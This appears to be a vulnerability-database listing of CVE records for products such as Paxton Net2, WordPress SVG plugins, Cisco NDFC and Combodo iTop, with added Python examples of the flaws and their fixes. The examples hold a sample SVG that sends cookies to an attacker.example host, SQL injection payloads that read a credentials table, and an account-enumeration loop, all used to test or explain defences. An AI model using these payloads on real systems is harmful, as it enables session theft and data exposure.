4966 matches found

Source: CVE | added 2024/11/11 12:00 a.m. | 75 views

CVE-2024-48939

Paxton Net2 prior to version 6.07.14023.5015 (SR4) has insufficient validation of the REST API License file, which can allow using the REST API with an invalid license and may enable retrieval of access-log data. Confirmed in multiple sources (NVD, Red Hat, CNVD/CNNVD, PT Security) across CVE-202...

CVSS 7.5 | AI score 6.5 | EPSS 0.007 | Exploits 0 | References 4
Source: Cvelist | added 2024/11/11 12:00 a.m. | 28 views

CVE-2024-48939

Insufficient validation performed on the REST API License file in Paxton Net2 before 6.07.14023.5015 SR4 enables use of the REST API with an invalid License File. Attackers may be able to retrieve access-log data...

EPSS 0.007 | Exploits 0 | References 3
Source: Vulnrichment | added 2024/11/11 12:00 a.m. | 17 views

CVE-2024-48939

Insufficient validation performed on the REST API License file in Paxton Net2 before 6.07.14023.5015 SR4 enables use of the REST API with an invalid License File. Attackers may be able to retrieve access-log data...

AI score 7 | EPSS 0.007 | Exploits 0 | References 3
Source: CNNVD | added 2024/11/10 12:00 a.m. | 5 views

Paxton Access Net2 security vulnerability

Paxton Access Net2 is an application from Paxton Access that provides simple and flexible site management. A security vulnerability exists in Paxton Access Net2 versions prior to 6.07.14023.5015 SR4, which stems from insufficient validation of the REST API license file, resulting i...

CVSS 7.5 | AI score 6.6 | EPSS 0.007 | Exploits 0 | References 2
Source: NVD | added 2024/11/08 11:15 p.m. | 42 views

CVE-2024-52004

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that, in specific cases, can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

CVSS 8.7 | EPSS 0.00679 | Exploits 0 | References 2
Source: Cvelist | added 2024/11/08 10:10 p.m. | 40 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that, in specific cases, can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

CVSS 8.7 | EPSS 0.00679 | Exploits 0 | References 2
Source: Vulnrichment | added 2024/11/08 10:10 p.m. | 37 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that, in specific cases, can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

CVSS 8.7 | AI score 7.4 | EPSS 0.00679 | Exploits 0 | References 2
Source: CVE | added 2024/11/08 10:10 p.m. | 89 views

CVE-2024-52004

CVE-2024-52004 affects MediaCMS (Python/Django + React, REST API). Root cause: insufficient input validation during media upload, allowing remote code execution under specific conditions when the portal permits uploading content. Affected versions: all prior to 4.1.0; patched in 4.1.0. Practical ...

CVSS 8.7 | AI score 7.4 | EPSS 0.00679 | Exploits 0 | References 2
Source: OSV | added 2024/11/08 10:10 p.m. | 19 views

CVE-2024-52004 Remote code execution vulnerabilities in MediaCMS

MediaCMS is an open source video and media CMS, written in Python/Django and React, featuring a REST API. MediaCMS has been prone to vulnerabilities that, in specific cases, can lead to remote code execution. All versions before v4.1.0 are susceptible, and users are highly recommended to...

CVSS 8.7 | AI score 8.1 | EPSS 0.00679 | Exploits 0 | References 4
Source: OSV | added 2024/11/08 12:15 p.m. | 6 views

CVE-2024-10325

The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

CVSS 5.4 | AI score 5.9 | EPSS 0.00288 | Exploits 0 | References 3
Source: NVD | added 2024/11/08 12:15 p.m. | 24 views

CVE-2024-10325

The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 1.6.45 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with...

CVSS 6.4 | EPSS 0.00288 | Exploits 0 | References 3
Source: Cvelist | added 2024/11/08 6:39 a.m. | 19 views

CVE-2024-10269 Easy SVG Support <= 3.7 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload

The Easy SVG Support plugin for WordPress is vulnerable to Stored Cross-Site Scripting via REST API SVG File uploads in all versions up to, and including, 3.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access a...

CVSS 6.4 | EPSS 0.00288 | Exploits 0 | References 3
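The three WordPress entries above share one root cause: an SVG accepted through an upload endpoint is an XML document that can carry script, event-handler attributes and javascript: URLs, and it executes when a browser later renders it inline. The check below is an added example of what "sufficient input sanitization" at upload time looks like; it is not code from the Elementor Header & Footer Builder or Easy SVG Support plugins, and the sample SVGs are constructed for the demonstration (including the attacker.example host). It refuses DOCTYPE/ENTITY declarations before parsing, then walks the tree and rejects scriptable elements, on* attributes and URL attributes whose scheme (after stripping the whitespace browsers ignore) is javascript:, vbscript: or data:.

```python
"""Pre-storage check for SVG uploads that refuses active content.
Added example; not code from the Elementor or Easy SVG Support plugins."""
import re
import xml.etree.ElementTree as ET

# Elements that execute script or embed arbitrary (X)HTML inside an SVG.
FORBIDDEN_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
# Attributes that take a URL and so can carry a javascript: or data: payload.
URL_ATTRIBUTES = {"href", "src"}
ACTIVE_SCHEMES = {"javascript", "vbscript", "data"}


def _local(name: str) -> str:
    """Drop the namespace prefix that ElementTree renders as '{uri}local'."""
    return name.rsplit("}", 1)[-1].lower()


def _scheme(url: str) -> str:
    """URL scheme as a browser reads it: whitespace and control characters
    that browsers ignore (e.g. 'java<TAB>script:') are stripped first."""
    cleaned = re.sub(r"[\x00-\x20]", "", url).lower()
    match = re.match(r"([a-z][a-z0-9+.-]*):", cleaned)
    return match.group(1) if match else ""


def svg_upload_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG upload must be refused; empty means it passed."""
    lowered = data.lower()
    # Refuse DOCTYPE/ENTITY before parsing: entity expansion and XXE are
    # parser problems, and an icon never needs either.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return ["DOCTYPE or ENTITY declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]

    findings = []
    if _local(root.tag) != "svg":
        findings.append(f"root element is <{_local(root.tag)}>, not <svg>")
    for element in root.iter():
        tag = _local(element.tag)
        if tag in FORBIDDEN_ELEMENTS:
            findings.append(f"forbidden element <{tag}>")
        for attr, value in element.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRIBUTES and _scheme(value) in ACTIVE_SCHEMES:
                findings.append(f"{_scheme(value)}: URL in {name} on <{tag}>")
    return findings


def svg_is_safe(data: bytes) -> bool:
    return not svg_upload_findings(data)


# Constructed samples, not taken from any real report.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="#09f"/>
</svg>"""

MALICIOUS_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" onload="alert(1)">
  <script>fetch('https://attacker.example/?c=' + document.cookie)</script>
  <a xlink:href="java&#9;script:alert(2)"><text x="1" y="5">click</text></a>
</svg>"""

ENTITY_SVG = b"""<!DOCTYPE svg [<!ENTITY lol "lol">]>
<svg xmlns="http://www.w3.org/2000/svg"><text>&lol;</text></svg>"""

if __name__ == "__main__":
    for label, sample in [("benign", BENIGN_SVG), ("malicious", MALICIOUS_SVG),
                          ("entity", ENTITY_SVG)]:
        print(label, svg_upload_findings(sample) or "OK")
```

Run on the samples, the benign icon passes, the malicious one is refused for the onload handler, the script element and the tab-obfuscated javascript: link, and the entity-bearing file is refused before the parser ever sees it. Rejecting is deliberately preferred over stripping: a sanitizer that rewrites the file must also get output escaping right, whereas a refused upload never reaches a page. Serving user SVGs from a separate origin or behind Content-Disposition: attachment is the usual second layer.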
Source: OSV | added 2024/11/06 5:15 p.m. | 3 views

CVE-2024-20536

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

CVSS 8.8 | AI score 6.1 | EPSS 0.00772 | Exploits 0 | References 1
Source: NVD | added 2024/11/06 5:15 p.m. | 16 views

CVE-2024-20536

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

CVSS 8.8 | EPSS 0.00772 | Exploits 0 | References 1
Source: Vulnrichment | added 2024/11/06 4:31 p.m. | 10 views

CVE-2024-20536 Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

CVSS 8.8 | AI score 8.4 | EPSS 0.00772 | Exploits 0 | References 1
Source: Cvelist | added 2024/11/06 4:31 p.m. | 22 views

CVE-2024-20536 Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

CVSS 8.8 | EPSS 0.00772 | Exploits 0 | References 1
Source: GithubExploit | added 2024/11/06 4:25 p.m. | 88 views

Exploit for Authentication Bypass Using an Alternate Path or Channel in Vivektamrakar Wp_Rest_Api_Fns

CVE-2024-49328 WP REST API FNS = 1.0.0 - Privilege Escalat...

CVSS 9.8 | AI score 9.8 | EPSS 0.01461 | Exploits 2
Source: Cisco | added 2024/11/06 4:00 p.m. | 19 views

Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability

A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient...

CVSS 8.8 | AI score 9.1 | EPSS 0.00772 | Exploits 0 | References 1
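The five CVE-2024-20536 records above describe the same pattern: a read-only API role supplies a filter value that the endpoint splices into SQL text, so the role boundary is enforced by the application while the database executes whatever the string says. The block below is an added example with a constructed SQLite inventory table and a users table; it is not NDFC's code, schema or endpoint, and the two payload strings are illustrative, not taken from the advisory. It shows the spliced query beside the parameterised one and what each returns for the same input.

```python
"""Read-only API filter parameter spliced into SQL versus bound as a parameter.
Added example with a constructed SQLite schema; not NDFC's code or data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed inventory plus a users table the read-only role must not see."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE switches (name TEXT, fabric TEXT, mgmt_ip TEXT);
        INSERT INTO switches VALUES ('leaf-1', 'fab-a', '10.0.0.11');
        INSERT INTO switches VALUES ('leaf-2', 'fab-a', '10.0.0.12');
        INSERT INTO switches VALUES ('spine-1', 'fab-b', '10.0.0.21');
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', '$2b$12$constructedhashvalue');
    """)
    return con


def list_switches_vulnerable(con: sqlite3.Connection, fabric: str) -> list[tuple]:
    """The request parameter becomes part of the SQL text (the defect)."""
    sql = f"SELECT name, mgmt_ip FROM switches WHERE fabric = '{fabric}'"
    return con.execute(sql).fetchall()


def list_switches_fixed(con: sqlite3.Connection, fabric: str) -> list[tuple]:
    """The parameter is bound; whatever it contains is compared as data."""
    sql = "SELECT name, mgmt_ip FROM switches WHERE fabric = ?"
    return con.execute(sql, (fabric,)).fetchall()


# Two constructed payloads a read-only user could send in the fabric filter.
PAYLOAD_TAUTOLOGY = "fab-b' OR '1'='1"
PAYLOAD_UNION = "x' UNION SELECT username, password_hash FROM users--"

if __name__ == "__main__":
    con = make_db()
    print("vulnerable, tautology:", list_switches_vulnerable(con, PAYLOAD_TAUTOLOGY))
    print("vulnerable, union    :", list_switches_vulnerable(con, PAYLOAD_UNION))
    print("fixed, union         :", list_switches_fixed(con, PAYLOAD_UNION))
```

With the spliced query the tautology returns every switch and the UNION payload returns the credential row from a table the endpoint was never meant to touch; the bound query returns nothing for either, because the payload is matched literally against the fabric column. Python's sqlite3 executes a single statement per call, so stacked statements (`'; DROP TABLE ...`) fail here; against a driver or database that permits them, the same defect also allows writes, which is why the advisory's wording is "execute arbitrary SQL commands" rather than "read data".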
Source: Cvelist | added 2024/11/05 6:11 p.m. | 17 views

CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop

Combodo iTop is a simple, web-based IT Service Management tool. An unauthenticated user can perform user enumeration, which makes it easier to brute-force a valid account. As a fix, the message displayed after a password reset request no longer reveals whether the user exists. This fix is included in...

CVSS 7.5 | EPSS 0.01259 | Exploits 0 | References 1
Source: Vulnrichment | added 2024/11/05 6:11 p.m. | 15 views

CVE-2024-51739 Users enumeration allowed through Rest API in Combodo iTop

Combodo iTop is a simple, web-based IT Service Management tool. An unauthenticated user can perform user enumeration, which makes it easier to brute-force a valid account. As a fix, the message displayed after a password reset request no longer reveals whether the user exists. This fix is included in...

CVSS 7.5 | AI score 7.6 | EPSS 0.01259 | Exploits 0 | References 1
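The fix described in the two CVE-2024-51739 records is a response-oracle removal: the password-reset endpoint must answer identically whether or not the address belongs to an account. The block below is an added example with a constructed user store and mail outbox; it is not iTop's code, and the endpoint shape (a status code plus a sentence) is an assumption made for the demonstration. It shows the leaky handler, the fixed handler, and the enumeration loop an unauthenticated attacker runs against each, so the effect of the fix is visible as a return value rather than a claim.

```python
"""Password-reset responses that reveal whether an account exists, and the fix.
Added example with a constructed user store; not iTop's code."""

# Constructed user store and mail outbox standing in for the application's.
USERS = {"alice@example.com": "Alice"}
OUTBOX: list[str] = []

GENERIC_MESSAGE = "If an account exists for that address, a reset link has been sent."


def send_reset_mail(email: str) -> None:
    """Stand-in for the real mailer: records the address instead of sending."""
    OUTBOX.append(email)


def reset_leaky(email: str) -> tuple[int, str]:
    """Before the fix: status and wording differ for known and unknown accounts."""
    if email in USERS:
        send_reset_mail(email)
        return 200, "A password reset link has been sent to your email address."
    return 404, "No account found for this email address."


def reset_fixed(email: str) -> tuple[int, str]:
    """After the fix: one status and one sentence regardless of the lookup result."""
    if email in USERS:
        send_reset_mail(email)
    return 200, GENERIC_MESSAGE


def enumerate_accounts(endpoint, candidates: list[str]) -> list[str]:
    """What an unauthenticated attacker does: compare each candidate's response
    with the response for an address that certainly does not exist."""
    baseline = endpoint("no-such-user@example.invalid")
    return [c for c in candidates if endpoint(c) != baseline]


CANDIDATES = ["bob@example.com", "alice@example.com", "carol@example.com"]

if __name__ == "__main__":
    print("leaky:", enumerate_accounts(reset_leaky, CANDIDATES))
    print("fixed:", enumerate_accounts(reset_fixed, CANDIDATES))
```

Against the leaky handler the loop confirms alice@example.com from a list of guesses; against the fixed one it confirms nothing, and the legitimate user still gets the mail. Note what the content fix does not close: the hit path does extra work (a lookup plus a mail send), so response time remains a weaker oracle. Sending the mail from a queue so both paths return in the same time, and rate-limiting the endpoint per source and per address, are the usual companions to the wording change.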